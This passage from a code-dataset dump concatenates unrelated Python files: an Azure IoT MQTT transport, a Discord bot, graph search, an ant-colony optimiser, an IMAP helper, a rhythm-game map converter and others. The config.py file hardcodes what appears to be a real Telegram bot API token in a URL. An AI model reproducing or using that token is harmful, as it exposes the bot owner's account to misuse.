tie the\n        PUBLISH to the PUBACK.\n        \"\"\"\n        if mid in self._in_progress_actions:\n            callback = self._in_progress_actions[mid]\n            del self._in_progress_actions[mid]\n            callback()\n        else:\n            # TODO: tests for unknown MID cases\n            logger.warning(\"PUBACK received with unknown MID: %s\", str(mid))\n\n    def _on_provider_subscribe_complete(self, mid):\n        \"\"\"\n        Callback that is called by the provider when it receives a SUBACK from the service\n\n        :param mid: message id that was returned by the provider when `subscribe` was called. 
This is used to tie the\n        SUBSCRIBE to the SUBACK.\n        \"\"\"\n        if mid in self._in_progress_actions:\n            callback = self._in_progress_actions[mid]\n            del self._in_progress_actions[mid]\n            callback()\n        else:\n            # TODO: tests for unknown MID cases\n            logger.warning(\"SUBACK received with unknown MID: %s\", str(mid))\n\n    def _on_provider_message_received_callback(self, topic, payload):\n        \"\"\"\n        Callback that is called by the provider when a message is received. This message can be any MQTT message,\n        including, but not limited to, a C2D message, an input message, a TWIN patch, a twin response (/res), and\n        a method invocation. This function needs to decide what kind of message it is based on the topic name and\n        take the correct action.\n\n        :param topic: MQTT topic name that the message arrived on\n        :param payload: Payload of the message\n        \"\"\"\n        logger.info(\"Message received on topic %s\", topic)\n        message_received = Message(payload)\n        # TODO: everything is handled in bytes here and needs to be changed, especially the topic\n        topic_str = topic.decode(\"utf-8\")\n        topic_parts = topic_str.split(\"/\")\n\n        if _is_input_topic(topic_str):\n            input_name = topic_parts[TOPIC_POS_INPUT_NAME]\n            message_received.input_name = input_name\n            _extract_properties(topic_parts[TOPIC_POS_MODULE], message_received)\n            self.on_transport_input_message_received(input_name, message_received)\n        elif _is_c2d_topic(topic_str):\n            _extract_properties(topic_parts[TOPIC_POS_DEVICE], message_received)\n            self.on_transport_c2d_message_received(message_received)\n        else:\n            pass # is there any other case\n\n    def _on_provider_unsubscribe_complete(self, mid):\n        \"\"\"\n        Callback that is called by the provider when it receives an UNSUBACK from the service\n\n        :param mid: message id that was returned by the provider when `unsubscribe` was called. This is used to tie the\n        UNSUBSCRIBE to the UNSUBACK.\n        \"\"\"\n        if mid in self._in_progress_actions:\n            callback = self._in_progress_actions[mid]\n            del self._in_progress_actions[mid]\n            callback()\n        else:\n            # TODO: tests for unknown MID cases\n            logger.warning(\"UNSUBACK received with unknown MID: %s\", str(mid))\n\n    def _add_action_to_queue(self, event_data):\n        \"\"\"\n        Queue an action for running later. All actions that need to run while connected end up in\n        this queue, even if they're going to be run immediately.\n\n        This is called by the state machine as part of a state transition\n\n        :param EventData event_data: Object created by the Transitions library with information about the state transition\n        \"\"\"\n        action = event_data.args[0]\n        if isinstance(action, TransportAction):\n            self._pending_action_queue.put_nowait(event_data.args[0])\n        else:\n            assert False\n\n    def _execute_action(self, action):\n        \"\"\"\n        Execute an action from the action queue. 
This is called when the transport is connected and the\n state machine is able to execute individual actions.\n\n :param TransportAction action: object containing the details of the action to be executed\n \"\"\"\n\n if isinstance(action, SendMessageAction):\n logger.info(\"running SendMessageAction\")\n message_to_send = action.message\n encoded_topic = _encode_properties(\n message_to_send, self._get_telemetry_topic_for_publish()\n )\n mid = self._mqtt_provider.publish(encoded_topic, message_to_send.data)\n self._in_progress_actions[mid] = action.callback\n\n elif isinstance(action, SubscribeAction):\n logger.info(\"running SubscribeAction topic=%s qos=%s\", action.topic, action.qos)\n mid = self._mqtt_provider.subscribe(action.topic, action.qos)\n logger.info(\"subscribe mid = %s\", mid)\n self._in_progress_actions[mid] = action.callback\n\n elif isinstance(action, UnsubscribeAction):\n logger.info(\"running UnsubscribeAction\")\n mid = self._mqtt_provider.unsubscribe(action.topic)\n self._in_progress_actions[mid] = action.callback\n\n elif isinstance(action, MethodReponseAction):\n logger.info(\"running MethodResponseAction\")\n topic = \"TODO\"\n mid = self._mqtt_provider.publish(topic, action.method_response)\n self._in_progress_actions[mid] = action.callback\n\n else:\n logger.error(\"Removed unknown action type from queue.\")\n\n def _execute_actions_in_queue(self, event_data):\n \"\"\"\n Execute any actions that are waiting in the action queue.\n This is called by the state machine as part of a state transition.\n This function actually calls down into the provider to perform the necessary operations.\n\n :param EventData event_data: Object created by the Transitions library with information about the state transition\n \"\"\"\n logger.info(\"checking _pending_action_queue\")\n while True:\n try:\n action = self._pending_action_queue.get_nowait()\n except queue.Empty:\n logger.info(\"done checking queue\")\n return\n\n self._execute_action(action)\n\n def _create_mqtt_provider(self):\n \"\"\"\n Create the provider object which is used by this instance to communicate with the service.\n No network communication can take place without a provider object.\n \"\"\"\n client_id = self._auth_provider.device_id\n\n if self._auth_provider.module_id:\n client_id += \"/\" + self._auth_provider.module_id\n\n username = self._auth_provider.hostname + \"/\" + client_id + \"/\" + \"?api-version=2018-06-30\"\n\n hostname = None\n if hasattr(self._auth_provider, \"gateway_hostname\"):\n hostname = self._auth_provider.gateway_hostname\n if not hostname or len(hostname) == 0:\n hostname = self._auth_provider.hostname\n\n if hasattr(self._auth_provider, \"ca_cert\"):\n ca_cert = self._auth_provider.ca_cert\n else:\n ca_cert = None\n\n self._mqtt_provider = MQTTProvider(client_id, hostname, username, ca_cert=ca_cert)\n\n self._mqtt_provider.on_mqtt_connected = self._on_provider_connect_complete\n self._mqtt_provider.on_mqtt_disconnected = self._on_provider_disconnect_complete\n self._mqtt_provider.on_mqtt_published = self._on_provider_publish_complete\n self._mqtt_provider.on_mqtt_subscribed = self._on_provider_subscribe_complete\n self._mqtt_provider.on_mqtt_unsubscribed = self._on_provider_unsubscribe_complete\n self._mqtt_provider.on_mqtt_message_received = self._on_provider_message_received_callback\n\n def _get_topic_base(self):\n \"\"\"\n return the string that is at the beginning of all topics for this\n device/module\n \"\"\"\n\n if self._auth_provider.module_id:\n return (\n \"devices/\"\n + 
self._auth_provider.device_id\n                + \"/modules/\"\n                + self._auth_provider.module_id\n            )\n        else:\n            return \"devices/\" + self._auth_provider.device_id\n\n    def _get_telemetry_topic_for_publish(self):\n        \"\"\"\n        return the topic string used to publish telemetry\n        \"\"\"\n        return self._get_topic_base() + \"/messages/events/\"\n\n    def _get_c2d_topic_for_subscribe(self):\n        \"\"\"\n        :return: The topic for cloud to device messages. It is of the format\n        \"devices/<device_id>/messages/devicebound/#\"\n        \"\"\"\n        return self._get_topic_base() + \"/messages/devicebound/#\"\n\n    def _get_input_topic_for_subscribe(self):\n        \"\"\"\n        :return: The topic for input messages. It is of the format\n        \"devices/<device_id>/modules/<module_id>/inputs/#\"\n        \"\"\"\n        return self._get_topic_base() + \"/inputs/#\"\n\n    def connect(self, callback=None):\n        \"\"\"\n        Connect to the service.\n\n        :param callback: callback which is called when the connection to the service is complete.\n        \"\"\"\n        logger.info(\"connect called\")\n        self._connect_callback = callback\n        self._trig_connect()\n\n    def disconnect(self, callback=None):\n        \"\"\"\n        Disconnect from the service.\n\n        :param callback: callback which is called when the connection to the service has been disconnected\n        \"\"\"\n        logger.info(\"disconnect called\")\n        self._disconnect_callback = callback\n        self._trig_disconnect()\n\n    def send_event(self, message, callback=None):\n        \"\"\"\n        Send a telemetry message to the service.\n\n        :param callback: callback which is called when the message publish has been acknowledged by the service.\n        \"\"\"\n        action = SendMessageAction(message, callback)\n        self._trig_add_action_to_pending_queue(action, self._pending_action_queue)\n\n    def send_output_event(self, message, callback=None):\n        \"\"\"\n        Send an output message to the service.\n\n        :param callback: callback which is called when the message publish has been acknowledged by the service.\n        \"\"\"\n        action = SendMessageAction(message, callback)\n        self._trig_add_action_to_pending_queue(action, self._pending_action_queue)\n\n    def _on_shared_access_string_updated(self):\n        \"\"\"\n        Callback which is called by the authentication provider when the shared access string has been updated.\n        \"\"\"\n        self._trig_on_shared_access_string_updated()\n\n    def enable_feature(self, feature_name, callback=None, qos=1):\n        \"\"\"\n        Enable the given feature by subscribing to the appropriate topics.\n\n        :param feature_name: one of the feature name constants from constant.py\n        :param callback: callback which is called when the feature is enabled\n        \"\"\"\n        logger.info(\"enable_feature %s called\", feature_name)\n        if feature_name == constant.INPUT_MSG:\n            self._enable_input_messages(callback, qos)\n        elif feature_name == constant.C2D_MSG:\n            self._enable_c2d_messages(callback, qos)\n        else:\n            logger.error(\"Feature name {} is unknown\".format(feature_name))\n            raise ValueError(\"Invalid feature name\")\n\n    def disable_feature(self, feature_name, callback=None):\n        \"\"\"\n        Disable the given feature by unsubscribing from the appropriate topics.\n        :param callback: callback which is called when the feature is disabled\n\n        :param feature_name: one of the feature name constants from constant.py\n        \"\"\"\n        logger.info(\"disable_feature %s called\", feature_name)\n        if feature_name == constant.INPUT_MSG:\n            self._disable_input_messages(callback)\n        elif feature_name == constant.C2D_MSG:\n            self._disable_c2d_messages(callback)\n        else:\n            logger.error(\"Feature name {} is unknown\".format(feature_name))\n            raise ValueError(\"Invalid feature name\")\n\n    def _enable_input_messages(self, callback=None, qos=1):\n        \"\"\"\n        Helper function to enable input messages\n\n        :param callback: callback which is called when the feature is enabled\n        \"\"\"\n        action = SubscribeAction(self._get_input_topic_for_subscribe(), qos, callback)\n        self._trig_add_action_to_pending_queue(action)\n        self.feature_enabled[constant.INPUT_MSG] = True\n\n    def _disable_input_messages(self, callback=None):\n        \"\"\"\n        Helper function to disable input messages\n\n        :param callback: callback which is called when the feature is disabled\n        \"\"\"\n        action = UnsubscribeAction(self._get_input_topic_for_subscribe(), callback)\n        self._trig_add_action_to_pending_queue(action)\n        self.feature_enabled[constant.INPUT_MSG] = False\n\n    def _enable_c2d_messages(self, callback=None, qos=1):\n        \"\"\"\n        Helper function to enable c2d messages\n\n        :param callback: callback which is called when the feature is enabled\n        \"\"\"\n        action = SubscribeAction(self._get_c2d_topic_for_subscribe(), qos, callback)\n        self._trig_add_action_to_pending_queue(action)\n        self.feature_enabled[constant.C2D_MSG] = True\n\n    def _disable_c2d_messages(self, callback=None):\n        \"\"\"\n        Helper function to disable c2d messages\n\n        :param callback: callback which is called when the feature is disabled\n        \"\"\"\n        action = UnsubscribeAction(self._get_c2d_topic_for_subscribe(), callback)\n        self._trig_add_action_to_pending_queue(action)\n        self.feature_enabled[constant.C2D_MSG] = False\n\n\ndef _is_c2d_topic(split_topic_str):\n    \"\"\"\n    Topics for c2d messages are of the following format:\n    devices/<device_id>/messages/devicebound\n    :param split_topic_str: The received topic string\n    \"\"\"\n    if \"messages/devicebound\" in split_topic_str and len(split_topic_str) > 4:\n        return True\n    return False\n\n\ndef _is_input_topic(split_topic_str):\n    \"\"\"\n    Topics for inputs are of the following format:\n    devices/<device_id>/modules/<module_id>/inputs/<input_name>\n    :param split_topic_str: The received topic string\n    \"\"\"\n    if \"inputs\" in split_topic_str and len(split_topic_str) > 6:\n        return True\n    return False\n\n\ndef _extract_properties(properties, message_received):\n    \"\"\"\n    Extract key=value pairs from custom properties and set the properties on the received message.\n    :param properties: The properties string which is ampersand (&) delimited key=value pair.\n    :param message_received: The message received with the payload in bytes\n    \"\"\"\n    key_value_pairs = properties.split(\"&\")\n\n    for entry in key_value_pairs:\n        pair = entry.split(\"=\")\n        key = urllib.parse.unquote_plus(pair[0])\n        value = urllib.parse.unquote_plus(pair[1])\n\n        if key == \"$.mid\":\n            message_received.message_id = value\n        elif key == \"$.cid\":\n            message_received.correlation_id = value\n        elif key == \"$.uid\":\n            message_received.user_id = value\n        elif key == \"$.to\":\n            message_received.to = value\n        elif key == \"$.ct\":\n            message_received.content_type = value\n        elif key == \"$.ce\":\n            message_received.content_encoding = value\n        else:\n            message_received.custom_properties[key] = value\n\n\ndef _encode_properties(message_to_send, topic):\n    \"\"\"\n    uri-encode the system properties of a message as key-value pairs on the topic with defined keys.\n    Additionally if the message has user defined properties, the property keys and values shall be\n    uri-encoded and appended at the end of the above topic with the following convention:\n    '<key1>=<value1>&<key2>=<value2>&<key3>=<value3>(...)'\n    :param message_to_send: The message to send\n    :param topic: The topic which has not been encoded yet. 
For a device it looks like\n \"devices//messages/events/\" and for a module it looks like\n \"devices///messages/events/\n :return: The topic which has been uri-encoded\n \"\"\"\n system_properties = {}\n if message_to_send.output_name:\n system_properties[\"$.on\"] = message_to_send.output_name\n if message_to_send.message_id:\n system_properties[\"$.mid\"] = message_to_send.message_id\n\n if message_to_send.correlation_id:\n system_properties[\"$.cid\"] = message_to_send.correlation_id\n\n if message_to_send.user_id:\n system_properties[\"$.uid\"] = message_to_send.user_id\n\n if message_to_send.to:\n system_properties[\"$.to\"] = message_to_send.to\n\n if message_to_send.content_type:\n system_properties[\"$.ct\"] = message_to_send.content_type\n\n if message_to_send.content_encoding:\n system_properties[\"$.ce\"] = message_to_send.content_encoding\n\n if message_to_send.expiry_time_utc:\n system_properties[\"$.exp\"] = (\n message_to_send.expiry_time_utc.isoformat()\n if isinstance(message_to_send.expiry_time_utc, date)\n else message_to_send.expiry_time_utc\n )\n\n system_properties_encoded = urllib.parse.urlencode(system_properties)\n topic += system_properties_encoded\n\n if message_to_send.custom_properties and len(message_to_send.custom_properties) > 0:\n topic += \"&\"\n user_properties_encoded = urllib.parse.urlencode(message_to_send.custom_properties)\n topic += user_properties_encoded\n\n return topic\n","sub_path":"azure-iot-hub-devicesdk/azure/iot/hub/devicesdk/transport/mqtt/mqtt_transport.py","file_name":"mqtt_transport.py","file_ext":"py","file_size_in_byte":30215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"654033386","text":"#!/usr/bin/python3\nimport discord\nimport asyncio\nfrom ..Config import discordConfig\n\nclient = discord.Client()\n\n@client.event\nasync def on_message(message):\n # we do not want the bot to reply to itself\n if message.author == client.user:\n return\n\n msg = '{0.author}: {0.content}'.format(message)\n await client.send_message(message.channel, msg)\n\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n\nclass MsgHandler:\n send_general_message = None\n\n def __init__(self, send_general_message):\n self.send_general_message = send_general_message\n\n async def connect(self):\n await client.start(discordConfig.TOKEN)\n \n def logout(self):\n client.logout()\n\n def send_message(self, message):\n print(\"sending message to discord\")\n for channel in client.get_all_channels():\n print(channel)\n if channel.name == \"general\":\n print(\"true?\")\n print(message)\n client.send_message(channel, message)\n \n","sub_path":"ChatConnector/DiscordHandler/discordHandler.py","file_name":"discordHandler.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"65994699","text":"from heapq import heappush, heappop\nfrom itertools import count\nimport networkx as nx\n\n\n\ndef Copy_all_shortest_paths_avoidnode(G, source, target, weight=None,avoid_node=None):\n if weight is not None:\n pred,dist = copy_dijkstra_predecessor_and_distance(G,source,weight=weight,avoid_node=avoid_node)\n else:\n pred = nx.predecessor(G,source)\n if target not in pred:\n raise Exception(\"No Path found with Given Bandwidth Constraint\")\n stack = [[target,0]]\n top = 0\n while top >= 0:\n node,i = stack[top]\n if node == source:\n yield [p for p,n in 
reversed(stack[:top+1])]\n if len(pred[node]) > i:\n top += 1\n if top == len(stack):\n stack.append([pred[node][i],0])\n else:\n stack[top] = [pred[node][i],0]\n else:\n stack[top-1][1] += 1\n top -= 1\n\ndef copy_dijkstra_predecessor_and_distance(G, source, cutoff=None, weight='weight',avoid_node=None):\n weight = copy_weight_function(G, weight)\n pred = {source: []} # dictionary of predecessors\n return (pred, copy_dijkstra(G, source, weight, pred=pred, cutoff=cutoff,avoid_node=avoid_node))\n\ndef copy_weight_function(G, weight):\n if callable(weight):\n return weight\n # If the weight keyword argument is not callable, we assume it is a\n # string representing the edge attribute containing the weight of\n # the edge.\n if G.is_multigraph():\n return lambda u, v, d: min(attr.get(weight, 1) for attr in d.values())\n return lambda u, v, data: data.get(weight, 1)\n\ndef copy_dijkstra(G, source, weight, pred=None, paths=None, cutoff=None,target=None,avoid_node=None):\n G_succ = G.succ if G.is_directed() else G.adj\n push = heappush\n pop = heappop\n dist = {} # dictionary of final distances\n seen = {source: 0}\n # fringe is heapq with 3-tuples (distance,c,node)\n # use the count c to avoid comparing nodes (may not be able to)\n c = count()\n fringe = []\n push(fringe, (0, next(c), source))\n while fringe:\n (d, _, v) = pop(fringe)\n if v in dist:\n continue # already searched this node.\n dist[v] = d\n if v == target:\n break\n for u, e in G_succ[v].items():\n cost = weight(v, u, e)\n if cost is None:\n continue\n vu_dist = dist[v] + cost\n if cutoff is not None:\n if vu_dist > cutoff:\n continue\n if u in dist:\n if vu_dist < dist[u]:\n raise ValueError('Contradictory paths found:','negative weights?')\n elif avoid_node:\n if avoid_node != u :\n if u not in seen or vu_dist < seen[u]:\n seen[u] = vu_dist\n push(fringe, (vu_dist, next(c), u))\n if paths is not None:\n paths[u] = paths[v] + [u]\n if pred is not None:\n pred[u] = [v]\n elif vu_dist == seen[u]:\n if pred is not None:\n pred[u].append(v)\n\n\n # The optional predecessor and path dictionaries can be accessed\n # by the caller via the pred and paths objects passed as arguments.\n return dist\n","sub_path":"avoid_node.py","file_name":"avoid_node.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"350293203","text":"import numpy as np\nimport multiprocessing\n\nfrom algorithm import Algorithm\n\n\nclass AntSystem(Algorithm):\n\n def __init__(self):\n self.settings_list = ['max_iterations', 'n_ants', 'pheronome_weight',\n 'heuristic_weight', 'evaporation_rate',\n 'deposit_constant']\n self.settings = {\n self.settings_list[0]: 100,\n self.settings_list[1]: 30,\n self.settings_list[2]: 1,\n self.settings_list[3]: 1,\n self.settings_list[4]: 0.1,\n self.settings_list[5]: 1,\n }\n\n def __str__(self):\n return \"Ant System\"\n\n def construct_solution(self, problem, pheromone_matrix):\n first_heuristic = problem.get_initial_candidate_list()\n first_heuristic = [pair for pair, x in first_heuristic]\n solution = problem.initial_double_assigned_solution(first_heuristic)\n while solution.count(None):\n candidate_list = []\n for candidate in problem.current_candidate_list(solution):\n element, location = candidate[0]\n heuristic = candidate[1]\n pheromone = pheromone_matrix[location,element]\n candidate_list.append(((element, location), heuristic,\n pheromone))\n visibility_dict = {}\n total_visibility = 0\n # for each position, heuristic and 
pheromone values\n for pair, h, ph in candidate_list:\n visibility = ((ph ** self.settings['pheronome_weight']) *\n (h ** self.settings['heuristic_weight']))\n visibility_dict[pair] = visibility\n total_visibility += visibility\n pick = np.random.uniform(0, 1)\n cumulative_proportion = 0\n for pair in visibility_dict:\n proportion = visibility_dict[pair] / total_visibility\n cumulative_proportion += proportion\n if pick <= cumulative_proportion:\n solution[pair[1]] = pair[0] + 1\n break\n return solution\n\n def update_pheromone_matrix(self, solution, cost, pheromone_matrix):\n deposit_amount = float(self.settings['deposit_constant'] / cost)\n for position, element in enumerate(solution):\n pheromone_matrix[position,element-1] += deposit_amount\n return pheromone_matrix\n\n def run(self, problem, initial_solution=None, max_avaliations=float('inf')):\n cost_history = []\n best_solution = None\n best_cost = float('inf')\n total_avaliations = 0\n n = problem.instance_size\n pheromone_matrix = np.full((n,n), 0.1)\n np.random.seed()\n ants_solutions = []\n for iteration in range(self.settings['max_iterations']):\n for ant in range(self.settings['n_ants']):\n solution = self.construct_solution(problem, pheromone_matrix)\n ants_solutions.append(solution)\n # evaporation\n pheromone_matrix *= (1 - self.settings['evaporation_rate'])\n for solution in ants_solutions:\n solution_cost = problem.evaluate(solution)\n total_avaliations += 1\n if solution_cost < best_cost:\n best_solution = solution\n best_cost = solution_cost\n pheromone_matrix = self.update_pheromone_matrix(\n solution, solution_cost, pheromone_matrix)\n if total_avaliations == max_avaliations:\n cost_history.append((iteration, best_cost))\n break\n else:\n cost_history.append((iteration, best_cost))\n continue\n break\n process = multiprocessing.current_process()\n pid = process._identity[0]\n return np.array(cost_history), best_solution, total_avaliations, pid\n","sub_path":"opt_prob_solver/ant_system2.py","file_name":"ant_system2.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358602351","text":"## importing required packages #################\nfrom imap_tools import MailBox,AND,OR,NOT\nfrom django.http import HttpResponse\nfrom imapclient import IMAPClient\nimport os\nimport math\nclass CustomMailBox():\n def __init__(self,user,pas,host='imap.gmail.com',n_per_page=40,folder='INBOX'):\n self.user=user\n self.pwd = pas\n self.host = host\n self.folder = folder\n self.n_per_page = n_per_page\n def authuser(self):\n try:\n self.Mb_main = MailBox(host=self.host)\n self.Mb_main.login(self.user,self.pwd)\n d = dict()\n for f in self.Mb_main.folder.list():\n d[f['name'].split('/')[-1]] = f['name']\n self.Mb_main.folder.set(d[self.folder])\n return d\n except:\n return False\n def getbypagenum(self,page_number,searchterm):\n d = self.authuser()\n if d:\n\n print(page_number,self.n_per_page,'ufifidh')\n mb = IMAPClient(self.host)\n mb.login(self.user,self.pwd)\n mb.select_folder(d[self.folder])\n if searchterm:\n ids= mb.search(['OR',['OR',[u'TEXT',f'{searchterm}'],['FROM',f'{searchterm}']],['OR',[u'SUBJECT',f'{searchterm}'],[u'BODY',f'{searchterm}']]])\n else:\n ids = mb.search()\n print(len(ids),'hmmm')\n last = math.ceil(len(ids)/self.n_per_page)\n print(last,'last page')\n page_number = last-page_number+1\n start = max(0,((page_number-1)*self.n_per_page))\n end = min(len(ids),(page_number*self.n_per_page))\n print(start,end)\n 
print(ids[start:end])\n return (next(self.Mb_main.fetch(AND(uid=f'{m}'),headers_only=True,reverse=True) )for m in reversed(ids[start:end])),last\n def getbyuid(self,uid):\n if self.authuser():\n return self.Mb_main.fetch(AND(uid=uid))\n def getbysearch(self,text):\n if self.authuser():\n return self.Mb_main.fetch(OR(subject=text))\n def get_searched_chunks(self):\n gen = self.get_searched_chunks()\n pass\n def get_info(self,folder='INBOX'):\n if self.authuser():\n return self.Mb_main.folder.status(folder)\n def get_folders(self):\n if self.authuser():\n return self.Mb_main.folder.list()\n def get_cur(self):\n if self.authuser():\n return self.Mb_main.folder.get()\n def create_folder(self,folder):\n if self.authuser():\n if self.Mb_main.folder.exists(folder):\n return 'no'\n self.Mb_main.folder.create(folder)\n return 'ok'\n def delete_folder(self,folder):\n if self.authuser():\n self.Mb_main.folder.delete(folder)\n def rename_folder(self,folder):\n d = self.authuser()\n if d:\n self.Mb_main.folder.rename(d[self.folder],folder)\n def delete_msg(self,uid):\n if self.authuser():\n self.Mb_main.delete(uid)\n def move_msgto(self,folder,uid):\n if self.authuser():\n self.Mb_main.move(uid,folder)\n def copy_msgto(self,folder,uid):\n if self.authuser():\n self.Mb_main.copy(uid,folder)\n","sub_path":"MailBox/Imap_utility.py","file_name":"Imap_utility.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"403304630","text":"import json\nimport yaml\nimport os\nfrom mutagen.mp3 import MP3\nfrom shutil import copyfile\nfrom config import *\n\nDIR_LEFT = 0x01\nDIR_UP = 0x02\nDIR_DOWN = 0x04\nDIR_RIGHT = 0x08\n\nQ_LANES = [0, DIR_LEFT, DIR_UP, DIR_DOWN, DIR_RIGHT]\nI_STRINGS = [\"\", \"[Left]\", \"[Up]\", \"[Up-Left]\",\n \"[Down]\", \"[Down-Left]\", \"[Up-Down]\", \"[Up-Down-Left]\",\n \"[Right]\", \"[Right-Left]\", \"[Up-Right]\", \"[Up-Right-Left]\",\n \"[Right-Down]\", \"[Right-Down-Left]\", \"[Up-Right-Down]\", \"[Up-Right-Down-Left]\"]\n\nSONG_NAME = \"music.ogg\"\nICON_NAME = \"icon.png\"\n\ndef speed_magic(arc_cnt, length):\n # TODO better handling\n return min(arc_cnt // length + 20, 36)\n\ndef write_intra_conf(path, arcs, meta):\n conf = {}\n conf[\"configVersion\"] = 2\n conf[\"name\"] = meta['title']\n conf[\"info\"] = \"Map automatically converted from Quaver\" # TODO difficulty, length and stuff\n conf[\"levelResources\"] = [] # TODO at least simple bg\n conf[\"tags\"] = ['Other'] # TODO extract from yaml\n conf[\"handCount\"] = 1\n conf[\"moreInfoURL\"] = \"\"\n conf[\"speed\"] = speed_magic(meta[\"arccount\"], meta[\"length\"])\n conf[\"lives\"] = 50\n conf[\"maxLives\"] = conf[\"lives\"]\n conf[\"musicFile\"] = SONG_NAME\n conf[\"musicTime\"] = meta[\"length\"]\n conf[\"iconFile\"] = ICON_NAME\n conf[\"environmentType\"] = -1\n conf[\"unlockConditions\"] = []\n conf[\"hidden\"] = False\n conf[\"checkpoints\"] = []\n conf[\"events\"] = []\n for time, lane in sorted(arcs.items()):\n conf[\"events\"].append(dict(time=time / 1000, data=['SpawnObj', I_STRINGS[lane]]))\n conf[\"e\"] = \"\"\n json_data = json.dumps(conf)\n with open(path, \"wt\") as f:\n f.write(json_data)\n\n\ndef load_qua(path):\n with open(path) as f:\n y = yaml.load(f)\n\n arcs = {}\n for hitObject in y['HitObjects']:\n if 'StartTime' in hitObject:\n t = hitObject['StartTime']\n else:\n t = 0\n lane = Q_LANES[hitObject['Lane']]\n if t in arcs:\n arcs[t] = arcs[t] | lane\n else:\n arcs[t] = lane\n\n meta = {}\n meta[\"title\"] = 
y['Artist'] + \" - \" + y['Title'] + \" (\" + y['DifficultyName'] + \")\"\n meta[\"song\"] = y[\"AudioFile\"]\n meta[\"image\"] = y[\"BackgroundFile\"]\n meta[\"arccount\"] = len(y['HitObjects'])\n meta[\"valid\"] = (y[\"Mode\"] == \"Keys4\")\n\n return arcs, meta\n\ndef convert_folder(foldername):\n folder = os.path.join(QUAVERPATH, foldername)\n for file in os.listdir(folder):\n if file.endswith(\".qua\"):\n arcs, meta = load_qua(os.path.join(folder, file))\n h = abs(hash(frozenset(arcs.items())))\n destpath = os.path.join(INTRAPATH, str(h))\n\n if not meta[\"valid\"]:\n print(\"Skipping invalid song: \" + meta[\"title\"])\n continue\n\n try:\n os.mkdir(destpath)\n except OSError:\n pass\n meta[\"length\"] = MP3(os.path.join(folder, meta[\"song\"])).info.length\n write_intra_conf(os.path.join(destpath, \"config.txt\"), arcs, meta)\n os.system(\"ffmpeg -i \\\"\" + os.path.join(folder, meta[\"song\"]) + \"\\\" -c:a libvorbis -q:a 4 \" + os.path.join(destpath, SONG_NAME)) # TODO multiplatform\n copyfile(os.path.join(folder, meta[\"image\"]), os.path.join(destpath, ICON_NAME))\n\n# example call\nif __name__ == \"__main__\":\n convert_folder(\"972 - 403\")\n","sub_path":"qua2intra.py","file_name":"qua2intra.py","file_ext":"py","file_size_in_byte":3375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"310845740","text":"import numpy as np\nfrom gym import Space\n\n\ndef shape(v):\n try:\n return v.shape # NumPy arrays and PyTorch Tensors\n except AttributeError:\n return (len(v), 1)\n\n\nclass Model:\n \"\"\"\n Standard interface for models for use in the gncgym. Requires that the shape of the state, inputs (optional), and\n disturbances (optional) be specified in subclasses, along with a function to initialise/reset a model and a step\n function that returns the next state according to the inputs.\n Notation for the variables is standard:\n x: state\n u: input\n v: disturbances\n y: measurement\n \"\"\"\n\n def __init__(self, state, input_space=None, output_space=None, disturbance_space=None):\n self._input_space = None\n self._output_space = None\n self._disturbance_space = None\n self._step = None\n self._output_map = dict()\n\n def init(self, x0=None):\n raise NotImplementedError\n\n def step(self, u, v):\n if not callable(self._step):\n raise NotImplementedError\n else:\n return self._step(u, v)\n\n \"\"\"\n Mandatory properties of a model. The spaces of the inputs must be defined explicitly to\n ensure that agents and controllers can assign inputs to the model properly. Additionally,\n the output of the model code must be mapped to keys used in the namedtuple representation\n of the state. 
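For example, a concrete model might fill these in as follows (a sketch; the\n    class and key names here are illustrative assumptions, not part of this module):\n\n        class MassModel(Model):\n            def init(self, x0=None):\n                self.x = x0\n                self._step = lambda u, v: self.x + u + v\n                self._output_map = {'position': 0, 'velocity': 1}\n    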
\n \"\"\"\n @property\n def input_space(self):\n if self._input_space is None or not issubclass(self._input_space, Space):\n raise NotImplementedError\n else:\n return self._input_space\n\n @property\n def disturbance_space(self):\n if self._disturbance_space is None or not issubclass(self._disturbance_space, Space):\n raise NotImplementedError\n else:\n return self._disturbance_space\n\n @property\n def output_map(self):\n if type(self._output_map) is not dict:\n raise NotImplementedError\n else:\n return self._output_map\n\n","sub_path":"src/gncgym/models/model_definitions.py","file_name":"model_definitions.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"501254702","text":"import os\n\nfrom dotenv import load_dotenv\nfrom example_google_table import users\n\nload_dotenv()\n\nBOT_TOKEN = os.getenv(\"BOT_TOKEN\")\nadmins = [\n 985485455\n]\n\n# for working notifications\napi_link = 'https://api.telegram.org/bot1267986653:AAEIxXafABfUFDDapLsEyjvNkeQ-6126q8Y'\nusers_id = users.id_and_name_of_users()\n\n\n\n\nip = os.getenv(\"ip\")\n\naiogram_redis = {\n 'host': ip,\n}\n\nredis = {\n 'address': (ip, 6379),\n 'encoding': 'utf8'\n}\n","sub_path":"data/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"468782542","text":"\r\nimport torch.nn as nn\r\nimport torch\r\nuse_cuda = torch.cuda.is_available()\r\n\r\n#state_dict = torch.load(args.model)\r\nimport torchvision.models as models\r\nmodel_path = ['../gdrive/My Drive/experiment/wideresnet.pth', '../gdrive/My Drive/experiment/resnext101.pth', '../gdrive/My Drive/experiment/densenet161.pth']\r\nnetworks = [\"wideresnet\", \"resnext\", \"densenet161\"]\r\n\r\nmodel_cache = []\r\nnum_class = 20\r\nfor i in range(len(model_path)):\r\n path = model_path[i]\r\n network = networks[i]\r\n if(network == \"densenet161\"):\r\n model = models.densenet161(pretrained=False)\r\n model.classifier = nn.Linear(2208, num_class)\r\n if(network == \"wideresnet\"):\r\n model = 